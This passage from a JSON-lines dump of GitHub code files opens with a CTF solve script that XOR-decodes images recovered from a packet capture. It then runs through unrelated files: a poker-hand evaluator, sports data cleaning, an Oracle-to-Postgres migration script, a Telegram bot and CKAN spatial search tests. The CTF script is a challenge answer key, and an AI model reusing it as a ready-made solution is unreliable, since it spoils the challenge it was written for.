rdpcap('images_0x2.pcap')\nfor p in pkts:\n if IP in p and p[IP].dst == '140.117.169.219':\n if Raw in p and b'filename' in p[Raw].load:\n raw = p[Raw].load\n\n filename = re.search(b'filename=\"(\\w*.\\w*)\"', raw)\n filename = filename.group(1).decode('utf-8')\n \n xor_key = base64.b64decode(raw.split(b'\\r\\n')[3])\n ciphertext = raw.split(b'\\r\\n')[7]\n\n res = [ word ^ xor_key[idx % len(xor_key)] for idx, word in enumerate(ciphertext) ]\n img = open(filename, 'wb')\n img.write(bytes(res))\n img.close()\n","repo_name":"MacacaHub/CTF-writeups","sub_path":"HTCF-CTF-2020/midterm/image 0x2/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"8796225160","text":"rank = dict()\r\n\r\nfor i in range(1, 10):\r\n rank[str(i)] = i\r\n \r\nfor val, r in enumerate('TJQKA', 10):\r\n rank[r] = val\r\n\r\nrank_trans = ' 123456789TJQKA'\r\n\r\ndef is_same_suit(cards):\r\n return all(c[1] == cards[0][1] for c in cards)\r\n\r\ndef Royal_Flush(cards):\r\n if not is_same_suit(cards):\r\n return False, cards\r\n\r\n values = [c[0] for c in cards]\r\n values.sort()\r\n if ''.join(values) == 'AJKQT':\r\n return True, []\r\n \r\n return False, cards\r\n \r\n \r\ndef Straight_Flush(cards):\r\n if not is_same_suit(cards):\r\n return False, cards\r\n\r\n values = [c[0] for c in cards]\r\n values.sort(key=lambda x: rank[x])\r\n if ''.join(values) in rank_trans:\r\n return True, []\r\n \r\n return False, cards\r\n \r\ndef Four_of_a_Kind(cards):\r\n cards.sort(key=lambda c: rank[c[0]])\r\n \r\n ranks = [rank[c[0]] for c in cards]\r\n \r\n if ranks.count(ranks[0]) == 4:\r\n return ranks[0], [c for c in cards if c[0] != rank_trans[ranks[0]]]\r\n elif ranks.count(ranks[1]) == 4:\r\n return ranks[1], [c for c in cards if c[0] != rank_trans[ranks[1]]]\r\n \r\n return False, cards\r\n\r\ndef Three_of_a_Kind(cards):\r\n cards.sort(key=lambda c: rank[c[0]])\r\n \r\n ranks = [rank[c[0]] for c in cards]\r\n \r\n if ranks.count(ranks[0]) == 3:\r\n return ranks[0], [c for c in cards if c[0] != rank_trans[ranks[0]]]\r\n elif ranks.count(ranks[1]) == 3:\r\n return ranks[1], [c for c in cards if c[0] != rank_trans[ranks[1]]]\r\n elif ranks.count(ranks[2]) == 3:\r\n return ranks[2], [c for c in cards if c[0] != rank_trans[ranks[2]]]\r\n \r\n return False, cards\r\n\r\ndef One_Pair(cards):\r\n cards.sort(key=lambda c: rank[c[0]])\r\n \r\n ranks = [rank[c[0]] for c in cards]\r\n \r\n for r in ranks:\r\n if ranks.count(r) == 2:\r\n return r, [c for c in cards if c[0] != rank_trans[r]]\r\n \r\n return False, cards\r\n\r\ndef Full_House(cards):\r\n res1, rest1 = Three_of_a_Kind(cards)\r\n if res1:\r\n res2, rest2 = One_Pair(rest1)\r\n if res2:\r\n return max(res1, res2), rest2\r\n return False, cards\r\n\r\ndef Flush(cards):\r\n if not is_same_suit(cards):\r\n return False, cards\r\n return True, []\r\n\r\ndef Straight(cards):\r\n values = [c[0] for c in cards]\r\n values.sort(key=lambda x: rank[x])\r\n\r\n if ''.join(values) in rank_trans:\r\n return True, []\r\n \r\n return False, cards\r\n\r\ndef Two_Pairs(cards):\r\n res1, rest1 = One_Pair(cards)\r\n if res1:\r\n res2, rest2 = One_Pair(rest1)\r\n if res2:\r\n return max(res1, res2), rest2\r\n return False, cards\r\n\r\ndef High_Card(cards):\r\n cards.sort(key=lambda c: rank[c[0]])\r\n \r\n return cards[-1], cards[0:-1]\r\n\r\ndef apply_highest(cards1, cards2):\r\n rest1 = cards1\r\n rest2 = cards2\r\n \r\n while rest1 and rest2:\r\n c1, rest1 = High_Card(rest1)\r\n c2, rest2 = High_Card(rest2)\r\n if c1[0] != c2[0]:\r\n if rank[c1[0]] > rank[c2[0]]:\r\n return 1\r\n else:\r\n return 2\r\n\r\n raise Exception('DRAW: {} {}'.format(cards1, cards2))\r\n\r\ndef apply_rules(cards1, cards2):\r\n rules_order = [Royal_Flush, Straight_Flush, Four_of_a_Kind, Full_House, Flush,\r\n Straight, Three_of_a_Kind, Two_Pairs, One_Pair]\r\n \r\n for f in rules_order:\r\n res1, rest1 = f(cards1)\r\n res2, rest2 = f(cards2)\r\n if res1 > res2:\r\n return 1\r\n elif res2 > res1:\r\n return 2\r\n \r\n if res1 and res2:\r\n return apply_highest(rest1, rest2)\r\n return apply_highest(cards1, cards2)\r\n\r\ndef check_pair(inp):\r\n cards = inp.split()\r\n return apply_rules(cards[:5], cards[5:])\r\n\r\n\r\ndef solve():\r\n wins1 = 0;\r\n with open('p054_poker.txt', 'r') as inp:\r\n for line in inp:\r\n if check_pair(line) == 1:\r\n wins1 += 1\r\n return wins1","repo_name":"XZentus/python","sub_path":"e54.py","file_name":"e54.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24540512628","text":"import os\nimport pandas as pd\n\n\ndef update_kenpom(data):\n \"\"\"\n Updates the school names in the Kenpom data to match the team names in the\n game scores data.\n\n Args:\n data(DataFrame): A pandas DataFrame with the Kenpom data.\n\n Returns:\n The same Kenpom data, but with updated school names.\n\n Raises:\n AssertionError: If data is not of type pandas DataFrame.\n \"\"\"\n\n # Check that data is a dataframe\n if not isinstance(data, pd.DataFrame):\n raise AssertionError('Input data must be a pandas dataframe.')\n\n return update_names(data, 'Kenpom/TRank')\n\n\ndef update_TRank(data):\n \"\"\"\n Updates the school names in the T-Rank data to match the team names in the\n game scores data.\n\n Args:\n data(DataFrame): A pandas DataFrame with the T-Rank data.\n\n Returns:\n The same T-Rank data, but with updated school names.\n\n Raises:\n AssertionError: If data is not of type pandas DataFrame.\n \"\"\"\n\n # Check that data is a dataframe\n if not isinstance(data, pd.DataFrame):\n raise AssertionError('Input data must be a pandas dataframe.')\n\n return update_names(data, 'Kenpom/TRank')\n\n\ndef update_basic(data):\n \"\"\"\n Updates the school names in the basic statistics data to match the team names\n in the game scores data.\n\n Args:\n data(DataFrame): A pandas DataFrame with the basic stats data.\n\n Returns:\n The same stats data, but with updated school names.\n\n Raises:\n AssertionError: If data is not of type pandas DataFrame.\n \"\"\"\n\n # Check that data is a dataframe\n if not isinstance(data, pd.DataFrame):\n raise AssertionError('Input data must be a pandas dataframe.')\n\n # Update team names to remove strange characters\n for i, row in data.iterrows():\n if '\\xa0' in row['Team']:\n team = row['Team'].replace('\\xa0', '').replace('NCAA', '')\n data.iloc[int(i), data.columns.get_loc('Team')] = team\n\n return update_names(data, 'Stats')\n\n\n# Actually updates the school names based on the schools.csv file.\ndef update_names(data, type):\n\n # Load school name data\n path = os.path.dirname(os.path.abspath(__file__)) + '/../../Data/Resources/schools.csv'\n school_names = pd.read_csv(path)\n stats = school_names.loc[:, type]\n scores = school_names.loc[:, 'Scores']\n\n # Create the dictionary from the two lists\n names_dict = dict(zip(stats, scores))\n\n # Go through schools in the data and replace school names in the dictionary with the right name\n for i, row in data.iterrows():\n if row['Team'] in names_dict:\n data.iloc[int(i), data.columns.get_loc('Team')] = names_dict[row['Team']]\n\n return data\n\n\n# Checks that all of the school names in the stats datasets are correctly in the scores datasets\ndef check_for_missing_names(scores_df, stats_df, verbose=False):\n\n # Check that each school in the stats df is in the scores df\n missing_names = []\n for name in stats_df['Team'].unique():\n if name not in scores_df['Home'].values or name not in scores_df['Away'].values:\n missing_names.append(name)\n\n if verbose:\n print(\"Checked {0} schools and found {1} matches.\".format(len(stats_df), len(missing_names)))\n return missing_names\n","repo_name":"pjmartinkus/College_Basketball","sub_path":"collegebasketball/data_prep/DataPrep.py","file_name":"DataPrep.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9393426685","text":"from bs4 import BeautifulSoup\nimport requests\npage_count = 1\nmax_page_count= 1021\nurl=\"https://www.imdb.com/search/title/?title_type=feature,tv_movie&user_rating=7.0,10.0&adult=include&sort=num_votes,desc&count=250&start=1&ref_=adv_nxt\"\nwhile (page_count\").format(self.name,\n self.length,\n self.beam,\n self.draft,\n self.tonnage)\n \nBase.metadata.create_all(engine) \n \ndef add_ships():\n \n session = Session()\n \n big_ship = Ship(name='Titanic',\n length=269.1,\n beam=28.0,\n draft=10.5,\n tonnage=46328.\n )\n \n little_ship = Ship(name='Maid of the Loch',\n length=58.2,\n beam=8.6,\n draft=1.37,\n tonnage=555.\n )\n \n session.add(big_ship)\n session.add(little_ship)\n session.commit()\n \n return \n\n","repo_name":"DTOcean/aneris","sub_path":"tests/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3860056164","text":"from dotenv import dotenv_values\nfrom psycopg2 import Error\nimport psycopg2\nimport numpy\nimport os\nimport cx_Oracle\nimport time\nimport sys\nimport datetime\nimport csv\n\nconfig = dotenv_values(\".env\")\n\noracle_host = config['ORACLE_HOST']\noracle_port = config['ORACLE_PORT']\noracle_service = config['ORACLE_SERVICE_NAME']\noracle_user = config['ORACLE_USER']\noracle_pass = config['ORACLE_PASS']\n\npostgres_host = config['POSTGRES_HOST']\npostgres_port = config['POSTGRES_PORT']\npostgres_database = config['POSTGRES_DATABASE_NAME']\npostgres_user = config['POSTGRES_USER']\npostgres_pass = config['POSTGRES_PASS']\n\ndsn_tns = cx_Oracle.makedsn(oracle_host, oracle_port, service_name=oracle_service)\nconnection = cx_Oracle.connect(\n user=oracle_user,\n password=oracle_pass,\n dsn=dsn_tns)\n\nif connection:\n print(\"Successfully connected to Oracle Database\")\n cursor = connection.cursor()\n\ntry:\n connectionPostgres = psycopg2.connect(user=postgres_user,\n password=postgres_pass,\n host=postgres_host,\n port=postgres_port,\n database=postgres_database)\n cursorPostgres = connectionPostgres.cursor()\n cursorPostgres.execute(\"SELECT version();\")\n record = cursorPostgres.fetchone()\n print(\"You are connected to - \", record, \"\\n\")\nexcept (Exception, Error) as error:\n print(\"Error while connecting to PostgreSQL\", error)\nfinally:\n print(\"PostgreSQL connection is complete\")\n\ndef progress(count, total, match, status=''):\n if count % match == 0:\n bar_len = 60\n filled_len = int(round(bar_len * count / float(total)))\n percents = round((100.0 * count / float(total)) + 1, 2)\n if percents >= 100 :\n percents = 100\n\n bar = '=' * filled_len + '-' * (bar_len - (filled_len + 1))\n\n sys.stdout.write('%s : [%s] %s%s \\r' % (status, bar, percents, '%'))\n sys.stdout.flush() \n\ndef convertArrayToList(arr):\n listData = list(arr)\n return listData\n\ndef csvNameFormat(name_file):\n name = name_file.upper().replace('.', '_') + \".csv\"\n return name\n\ndef queryColumnName(tableName, flag):\n tableQuery = tableName.split('.')\n sql = \"\"\" SELECT \n OWNER,\n TABLE_NAME,\n COLUMN_NAME,\n DATA_TYPE,\n DATA_LENGTH,\n DATA_PRECISION,\n DATA_SCALE\n FROM ALL_TAB_COLS\n WHERE TABLE_NAME = '{1}'\n AND OWNER = '{0}'\n AND COLUMN_NAME NOT IN ( 'PASSWORD', 'VERSION', 'ID' )\n ORDER BY COLUMN_ID ASC \"\"\".format(tableQuery[0], tableQuery[1])\n cursor.execute(sql)\n listTableName = []\n while True:\n rows = cursor.fetchone()\n if rows is None:\n break\n # print(rows)\n if flag == 1:\n listTableName.append(rows[2].lower())\n if flag == 2:\n listTableName.append(rows)\n return listTableName\n\ndef headerColumn(listColumnName):\n listColumn = listColumnName\n l = len(listColumn) - 1\n i = 0\n header = '';\n\n for d in listColumn:\n if i == l:\n header = header + d\n else:\n header = header + d + ','\n i = i + 1\n header = header + ''\n return header\n\ndef convertType(datatype, datalength, precision, scale):\n switcher = {\n \"CHAR\": 'CHAR({0})'.format(datalength),\n \"VARCHAR\": 'VARCHAR({0})'.format(datalength),\n \"VARCHAR2\": 'VARCHAR({0})'.format(datalength),\n \"NUMBER\": 'NUMERIC({0},{1})'.format(precision, scale),\n \"DATE\": 'DATE'\n }\n return switcher.get(datatype, -1)\n\ndef sqlPaserCreateTable(data, tablename):\n tableName = tablename\n sql = \"\"\"\n DROP TABLE IF EXISTS {0};\n CREATE TABLE {0}(\"\"\".format(tableName)\n length = len(data) - 1\n for idx, val in enumerate(data):\n datatype = convertType(val[3], val[4], val[5], val[6])\n if datatype == -1:\n print(\"Not match datatype to convert for postgres database = Column:{0}, Type:{1}\". format(val[2], val[4]))\n exit()\n if idx == length:\n sql = sql + \"\\n {0} {1}\".format(val[2], datatype) + \"\\n);\"\n else:\n sql = sql + \"\\n {0} {1}\".format(val[2], datatype) + \",\"\n return sql\n\ndef convertDataToCsv(tablename):\n tableName = tablename\n tableColumnName = queryColumnName(tableName, 1)\n sqlCount = \"SELECT COUNT(*) FROM {0} WHERE ROWNUM <= 50 ORDER BY bill_period DESC\".format(tableName)\n sql = \"SELECT * FROM {0} WHERE ROWNUM <= 50 ORDER BY bill_period DESC\".format(tableName)\n #sqlCount = \"SELECT COUNT(*) FROM {0} \".format(tableName)\n #sql = \"SELECT * FROM {0}\".format(tableName)\n cursor.execute(sqlCount)\n count = cursor.fetchone()\n count = count[0]\n print(\"Count {0}\".format(count))\n cursor.execute(sql)\n\n timeNow = datetime.datetime.now().isoformat()\n print(\"{0} : (Table={1}) Waiting query data to csv...\".format(timeNow, tableName))\n fileName = csvNameFormat(tableName)\n csv_file = open(fileName, 'w')\n csv_writer = csv.writer(csv_file, delimiter=\",\", lineterminator='\\r\\n', quotechar = '\\\\')\n i = 0\n header = headerColumn(tableColumnName)\n csv_writer.writerow(header)\n while True:\n row = cursor.fetchone()\n if row is None:\n break\n row = convertArrayToList(row)\n csv_writer.writerow(row)\n progress(i, count, 10, status='Query data to csv')\n i += 1\n\n timeNow = datetime.datetime.now().isoformat()\n print(\"{0} : (Table={1}) Downloaded.\".format(timeNow, tableName))\n del(count)\n del(timeNow)\n\ndef csvToDatabase(tableName, targetTable):\n fileName = csvNameFormat(tableName)\n tableColumnName = queryColumnName(tableName, 1)\n tableColumn = queryColumnName(tableName, 2)\n sqlCreateTable = sqlPaserCreateTable(tableColumn, targetTable)\n cursorPostgres.execute(sqlCreateTable)\n np_arr1 = numpy.array(tableColumnName)\n with open(fileName, 'r') as f:\n next(f) # Skip the header row.\n cursorPostgres.copy_from(f, targetTable, sep=',', columns=np_arr1)\n connectionPostgres.commit()\n\ndef migrateExecute(call_procedure):\n sql = call_procedure\n timeNow = datetime.datetime.now().isoformat()\n print(\"{0} : (Procedure={1}) Executing....\\r\".format(timeNow, sql))\n cursorPostgres.execute(sql)\n record = cursorPostgres.fetchone()\n time.sleep(1.5)\n timeNow = datetime.datetime.now().isoformat()\n print(\"{0} : (Procedure={1}) Executed.\\r\".format(timeNow, sql))\n\nconvertDataToCsv('BILL.UNIT_PROCESS')\nconvertDataToCsv('BILL.FT_MASTER')\ncsvToDatabase('BILL.UNIT_PROCESS', 'unit_process')\ncsvToDatabase('BILL.FT_MASTER', 'ft_master')\nmigrateExecute(\"SELECT 1, 2;\")\nmigrateExecute(\"SELECT 1, 3;\")\n\nwhile True:\n time.sleep(0.100)\n pass\n","repo_name":"prtha112/oracle-to-postgres","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9136364900","text":"import numpy as np\nimport pickle\n\n\ndef get_agent_state_value_functions(learning_manager, init_tables=None):\n # copy learned tables into init tables for initializing test manager and later learning managers\n if init_tables is None:\n init_tables = [{}, {}]\n\n for type, func_dict in learning_manager.experiment_instance.function.function_dict.items():\n if type not in init_tables[0]:\n init_tables[0][type] = {}\n if isinstance(func_dict, dict):\n for type2, function in func_dict.items():\n if type2 not in init_tables[0][type]:\n init_tables[0][type][type2] = function\n else:\n init_tables[0][type] = func_dict\n\n for instance in learning_manager.in_task_instances:\n if instance.task.task_type not in init_tables[1]:\n init_tables[1][instance.task.task_type] = instance.function.function\n\n return init_tables\n\n\ndef sparse_output(reward_at_step, state_sequence, task_at_step, costs_at_step):\n sp_reward_at_step = [0]\n sp_state_sequence = [state_sequence[0]]\n sp_task_at_step = [task_at_step[0]]\n sp_costs_at_step = [costs_at_step[0]]\n reward = reward_at_step[0]\n\n for i in range(1, len(state_sequence)):\n if state_sequence[i] != sp_state_sequence[-1]:\n sp_reward_at_step[-1] = reward\n sp_reward_at_step.append(0)\n sp_state_sequence.append(state_sequence[i])\n sp_task_at_step.append(task_at_step[i])\n sp_costs_at_step.append(costs_at_step[i])\n reward = 0\n\n reward += reward_at_step[i]\n\n return np.array(sp_reward_at_step), np.array(sp_state_sequence), sp_task_at_step, np.array(sp_costs_at_step)\n\n\ndef get_state_trajectory(trajectory):\n obs = trajectory[0]\n num_visited_states = 1\n start_time = obs.time\n obs.time = 0\n state_trajectory = [obs]\n for i in range(1, len(trajectory)):\n if trajectory[i].state_estimate != obs.state_estimate or trajectory[i].task_id != obs.task_id:\n num_visited_states += 1\n obs = trajectory[i]\n obs.time -= start_time\n state_trajectory.append(obs)\n\n return state_trajectory, num_visited_states\n\n\ndef load_pkl_file(file_path):\n with open(file_path, 'rb') as f:\n pkl_obj = pickle.load(f)\n return pkl_obj\n\n\ndef add_trajectories_to_task(task_list, trajectory_list):\n for i in range(len(task_list)):\n task_list[i].trajectories = trajectory_list[task_list[i].task_type]\n\n\ndef add_state_distribution_to_task(task_list, distribution_list):\n for i in range(len(task_list)):\n task_list[i].delta_state_distribution = distribution_list[task_list[i].task_type]","repo_name":"christophgebhardt/task-interleaving","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10387577883","text":"import scipy.ndimage as ndi\nimport numpy as np\nimport skimage.io as io\nimport matplotlib.pyplot as plt\n\nc=io.imread('C:\\\\Users\\\\kamel\\\\Music\\\\misc\\\\cameraman.tif')\ncmax=ndi.generic_filter(c,max,[3,3])\nio.imshow(cmax)\nio.show()\n\ncmin=ndi.minimum_filter(c,size=(3,3))\nio.imshow(cmin)\nio.show()\n\ncm=ndi.median_filter(c,size=(3,3))\nio.imshow(cm)\nio.show()\ncm2=ndi.rank_filter(c,4,size=(3,3))\nio.imshow(cm2)\nio.show()\n","repo_name":"KameliaZaman/DIP-Lab","sub_path":"RnD/Neighborhood/task8.py","file_name":"task8.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18475617019","text":"from traceback import print_tb\nfrom package.app.api.modules.resignation.ResignationController import ResignationController\nfrom package.app.client.dialog.DialogService import DialogService\nfrom package.app.client.dialog.InfoBox import InfoBoxProps\nfrom package.app.client.gui.box.Box import Box\nfrom package.app.client.modules.resignation.ResignationValidator import (\n ResignationValidator,\n)\nfrom package.app.client.state.ComponentState import ComponentState\nfrom package.app.meta.Singleton import Singleton\nfrom package.app.client.utils.form import getEntryBuffer\nfrom package.app.api.modules.resignation.dto.ResignationDto import ResignationDto\nfrom package.app.client.gui.imports import Gtk\nfrom package.app.validation.IValidator import IValidator\nfrom datetime import datetime\n\n\nclass ResignationComponent(metaclass=Singleton):\n def __init__(self):\n self.__state = ComponentState()\n self.__validator: IValidator = ResignationValidator()\n self.__controller = ResignationController()\n self.__dialogService = DialogService()\n\n def requestRegistration(self, selectedEmployeeId, selectedResignationTypeId, memoText) -> bool:\n\n memo = memoText\n selectedEmployee = self.getEmployeeById(\n selectedEmployeeId)\n selectedResignationType = self.getResignationTypeById(\n selectedResignationTypeId)\n\n try:\n dto = ResignationDto(\n employee_id=selectedEmployee.user_id,\n resignation_type_id=selectedResignationType.id,\n date = datetime.now(),\n memo = memo,\n employee = selectedEmployee,\n resignation_type = selectedResignationType,\n )\n except AttributeError:\n dto = ResignationDto(\n employee_id=None,\n resignation_type_id=None,\n date = None,\n memo = None,\n employee = None,\n resignation_type = None,\n )\n\n if self.__validator.execute(dto):\n entity = self.__controller.registerResignation(dto)\n if entity:\n self.__displaySuccessMessage()\n return True\n \n return False\n\n def getState(self) -> ComponentState:\n return self.__state\n\n def __displaySuccessMessage(self):\n content = Box()\n content.pack_default(Gtk.Label(\"A demissão foi corretamente executada!\"))\n self.__dialogService.displayInfoBox(\n InfoBoxProps(title=\"Demissão executada\", content=content)\n )\n\n def getEmployees(self):\n return self.__controller.getEmployees()\n\n def getResignationTypes(self):\n return self.__controller.getResignationTypes()\n\n def getEmployeeById(self, id):\n return self.__controller.getEmployeeById(id)\n\n def getResignationTypeById(self, resignationId):\n return self.__controller.getResignationTypeById(\n resignationId)\n\n def changeEmployeeRegisterStatus(self, id:int):\n return self.__controller.changeEmployeeRegisterStatus(id)\n","repo_name":"BrunoBross/A1A-Car-Wash","sub_path":"package/app/client/modules/resignation/ResignationComponent.py","file_name":"ResignationComponent.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39482230603","text":"#!/usr/bin/env python\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nversion = file('version.txt').read().strip()\n\nsetup(name='icalendar',\n package_dir={'': 'src'},\n packages=['icalendar'],\n version=version,\n\n # metadata for upload to PyPI\n author='MaxM',\n author_email='maxm@mxm.dk',\n description='iCalendar parser/generator',\n license='GPL2.1',\n keywords='calendar icalendar',\n url='http://codespeak.net/icalendar/',\n long_description=\"\"\"iCalendar is a parser/generator of iCalendar files \n (RFC 2445) for use with Python.\"\"\",\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License (GPL)',\n 'Operating System :: OS Independent'],\n platforms='All',\n )","repo_name":"ryba-xek/iCalendar","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"20151535440","text":"import pickle\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import r2_score\nfrom scipy.stats import pearsonr, spearmanr\nimport math\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport nibabel as nib\nfrom nilearn import plotting\n\n\ndef pearsonr_cor_func(obs,pred):\n return(pearsonr(obs,pred)[0])\n\ndef spearmanr_cor_func(obs,pred):\n return(spearmanr(obs,pred)[0])\n\n \ndef within_group_performance(results,cor_func,\n group_col_name='result_group',\n obs_col_name='y',\n pred_col_name='y_pred'\n \n ):\n results[obs_col_name] = results[obs_col_name].astype(float)\n results[pred_col_name] = results[pred_col_name].astype(float)\n within_subj_predictions = []\n for group in results[group_col_name].unique():\n group_results = results.loc[results[group_col_name]==group,].copy()\n\n #get means and SDs\n obs_mean = np.mean(group_results[obs_col_name])\n pred_mean = np.mean(group_results[pred_col_name])\n obs_sd = np.std(group_results[obs_col_name])\n pred_sd = np.std(group_results[pred_col_name])\n\n #mean center\n group_results[obs_col_name] = (group_results[obs_col_name] - obs_mean)\n group_results[pred_col_name] = (group_results[pred_col_name] - pred_mean)\n\n within_subj_prediction = pearsonr(group_results[obs_col_name],group_results[pred_col_name])[0]\n #print(within_subj_prediction)\n #print(math.pow(pearsonr(group_results[obs_col_name],group_results['y_pred'])[0],2))\n\n\n #what if we we re-ranked the predicted values into groups along the \n if (within_subj_prediction< (-0.5)):\n\n sp = sns.scatterplot(group_results[obs_col_name],group_results[pred_col_name])\n plt.show()\n display(pd.DataFrame(group_results.groupby(obs_col_name).y_pred.mean()))\n #display(group_results)\n within_subj_predictions = within_subj_predictions + [within_subj_prediction]\n return(within_subj_predictions)","repo_name":"UOSAN/DEV_scripts","sub_path":"fMRI/ml/.ipynb_checkpoints/measure_results-checkpoint.py","file_name":"measure_results-checkpoint.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19834155792","text":"import random\nimport sys\nimport os\n\n#Number of tests\ntests = int(sys.argv[1])\n#Parameters to run against script\nn = int(sys.argv[2])\n#Range of random numbers\nm = int(sys.argv[3])\n\nos.system(\"python3 genRandom.py \" + str(n) + \" \" + str(m) + \" > input.txt\")\n \nwith open(\"input.txt\") as fp:\n for i in fp:\n os.system(\"python3 change.py \" + str(i))\n\n\n","repo_name":"lumunge/100-days-of-code","sub_path":"Algorithms/GreedyAlgorithms/change/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12728674293","text":"import aiogram.utils.markdown as fmt\nfrom aiogram import types\nfrom aiogram.dispatcher import FSMContext, filters\n\nfrom loader import dp\nfrom messages.config import ASSET_EMOJI\nfrom states.asset_state import AssetState\n\n\n@dp.message_handler(filters.Text(equals=ASSET_EMOJI.get('share')), state=AssetState)\nasync def cmd_share(message: types.Message, state: FSMContext):\n type_asset = 'share'\n async with state.proxy() as data:\n data['type_asset'] = type_asset\n\n # await AssetState.next()\n await state.update_data(type_asset='share')\n await message.answer('Введите тикер акции, уникальное короткое название инструмента (длина: 1-6 символов).')\n\n\n@dp.message_handler(filters.Text(equals=ASSET_EMOJI.get('etf')), state=AssetState)\nasync def cmd_fund(message: types.Message, state: FSMContext):\n type_asset = 'etf'\n async with state.proxy() as data:\n data['type_asset'] = type_asset\n await message.answer('Введите тикер фонда, уникальное короткое название инструмента (длина: 1-6 символов).')\n\n\n@dp.message_handler(filters.Text(equals=ASSET_EMOJI.get('crypto')), state=AssetState)\nasync def cmd_crypto(message: types.Message, state: FSMContext):\n type_asset = 'crypto'\n async with state.proxy() as data:\n data['type_asset'] = type_asset\n await message.answer('Введите тикер отношения, например: \"BTCUSDT\"')\n","repo_name":"Fantastickck/assets-info-bot--aiogram","sub_path":"handlers/users/market_data/type_asset.py","file_name":"type_asset.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73832309493","text":"import logging\nimport json\nfrom pprint import pprint\nfrom nose.plugins.skip import SkipTest\nfrom nose.tools import assert_equal, assert_raises\nfrom ckan.logic.action.create import package_create\nfrom ckan.logic.action.delete import package_delete\nfrom ckan.logic.schema import default_create_package_schema\nfrom ckan import model\n\nfrom ckan.model import Package, Session\nimport ckan.lib.search as search\nfrom ckan.tests import CreateTestData, setup_test_search_index,WsgiAppCase\nfrom ckan.tests.functional.api.base import ApiTestCase\nfrom ckan.tests import TestController as ControllerTestCase\nfrom ckanext.spatial.tests.base import SpatialTestBase\n\nlog = logging.getLogger(__name__)\n\n\n\nclass TestSpatialApi(ApiTestCase,SpatialTestBase,ControllerTestCase):\n\n api_version = '2'\n\n @classmethod\n def setup_class(self):\n super(TestSpatialApi,self).setup_class()\n setup_test_search_index()\n CreateTestData.create_test_user()\n self.package_fixture_data = {\n 'name' : u'test-spatial-dataset-search-point',\n 'title': 'Some Title',\n 'extras': [{'key':'spatial','value':self.geojson_examples['point']}]\n }\n self.base_url = self.offset('/search/dataset/geo')\n\n def _offset_with_bbox(self,minx=-180,miny=-90,maxx=180,maxy=90,crs=None):\n offset = self.base_url + '?bbox=%s,%s,%s,%s' % (minx,miny,maxx,maxy)\n if crs:\n offset = offset + '&crs=%s' % crs\n return offset\n\n def test_basic_query(self):\n schema = default_create_package_schema()\n context = {'model':model,'session':Session,'user':'tester','extras_as_string':True,'schema':schema,'api_version':2}\n package_dict = package_create(context,self.package_fixture_data)\n package_id = context.get('id')\n\n # Point inside bbox\n offset = self._offset_with_bbox()\n\n res = self.app.get(offset, status=200)\n res_dict = self.data_from_res(res)\n\n assert res_dict['count'] == 1\n assert res_dict['results'][0] == package_id\n\n # Point outside bbox\n offset = self._offset_with_bbox(-10,10,-20,20)\n\n res = self.app.get(offset, status=200)\n res_dict = self.data_from_res(res)\n\n assert res_dict['count'] == 0\n assert res_dict['results'] == []\n\n # Delete the package and ensure it does not come up on\n # search results\n package_delete(context,{'id':package_id})\n offset = self._offset_with_bbox()\n\n res = self.app.get(offset, status=200)\n res_dict = self.data_from_res(res)\n\n assert res_dict['count'] == 0\n assert res_dict['results'] == []\n\n\n\nclass TestActionPackageSearch(SpatialTestBase,WsgiAppCase):\n\n @classmethod\n def setup_class(self):\n super(TestActionPackageSearch,self).setup_class()\n setup_test_search_index()\n self.package_fixture_data_1 = {\n 'name' : u'test-spatial-dataset-search-point-1',\n 'title': 'Some Title 1',\n 'extras': [{'key':'spatial','value':self.geojson_examples['point']}]\n }\n self.package_fixture_data_2 = {\n 'name' : u'test-spatial-dataset-search-point-2',\n 'title': 'Some Title 2',\n 'extras': [{'key':'spatial','value':self.geojson_examples['point_2']}]\n }\n\n CreateTestData.create()\n\n @classmethod\n def teardown_class(self):\n model.repo.rebuild_db()\n\n def test_1_basic(self):\n schema = default_create_package_schema()\n context = {'model':model,'session':Session,'user':'tester','extras_as_string':True,'schema':schema,'api_version':2}\n package_dict_1 = package_create(context,self.package_fixture_data_1)\n del context['package']\n package_dict_2 = package_create(context,self.package_fixture_data_2)\n\n postparams = '%s=1' % json.dumps({\n 'q': 'test',\n 'facet.field': ('groups', 'tags', 'res_format', 'license'),\n 'rows': 20,\n 'start': 0,\n 'extras': {\n 'ext_bbox': '%s,%s,%s,%s' % (10,10,40,40)\n }\n })\n res = 